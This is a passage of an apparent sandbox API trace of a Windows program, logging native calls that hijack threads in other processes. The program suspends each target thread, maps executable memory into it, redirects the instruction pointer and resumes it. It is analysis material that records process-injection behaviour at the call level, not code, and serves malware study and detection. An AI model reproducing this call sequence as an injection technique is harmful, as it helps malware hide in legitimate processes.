SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0139.376] NtClose (Handle=0x1a4) returned 0x0 [0139.376] NtClose (Handle=0x1a0) returned 0x0 [0139.378] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x118c, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x1a0) returned 0x0 [0139.378] NtQueryInformationProcess (in: ProcessHandle=0x1a0, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0139.378] NtQueryInformationProcess (in: ProcessHandle=0x1a0, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0139.378] NtReadVirtualMemory (in: ProcessHandle=0x1a0, BaseAddress=0x355000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0139.378] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0139.381] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x1190) | out: ThreadHandle=0xdea64*=0x1a4) returned 0x0 [0139.381] NtSuspendThread (in: ThreadHandle=0x1a4, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0139.381] NtMapViewOfSection (in: SectionHandle=0x184, ProcessHandle=0x1a0, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x2210000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0139.395] NtGetContextThread (in: ThreadHandle=0x1a4, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x355000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7561895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0139.404] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x1a8) returned 0x0 [0139.404] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0x160200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x75d0000, SectionOffset=0x0, ViewSize=0xde6ac*=0x161000) returned 0x0 [0139.411] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0x1a0, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0x160200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x2080000, SectionOffset=0x0, ViewSize=0xde6e8*=0x161000) returned 0x0 [0139.444] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x75d0000) returned 0x0 [0139.452] NtClose (Handle=0x1a8) returned 0x0 [0139.452] NtSetContextThread (ThreadHandle=0x1a4, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x355000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x214d717, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0139.467] NtResumeThread (in: ThreadHandle=0x1a4, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0139.467] NtClose (Handle=0x1a0) returned 0x0 [0139.467] NtClose (Handle=0x1a4) returned 0x0 [0139.468] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x11ac, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x1a4) returned 0x0 [0139.468] NtQueryInformationProcess (in: ProcessHandle=0x1a4, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0139.468] NtQueryInformationProcess (in: ProcessHandle=0x1a4, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0139.468] NtReadVirtualMemory (in: ProcessHandle=0x1a4, BaseAddress=0x3ee000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0139.468] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0139.534] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x11b0) | out: ThreadHandle=0xdea64*=0x1a0) returned 0x0 [0139.534] NtSuspendThread (in: ThreadHandle=0x1a0, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0139.534] NtMapViewOfSection (in: SectionHandle=0x184, ProcessHandle=0x1a4, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x22c0000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0139.654] NtGetContextThread (in: ThreadHandle=0x1a0, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x3ee000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7561895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, 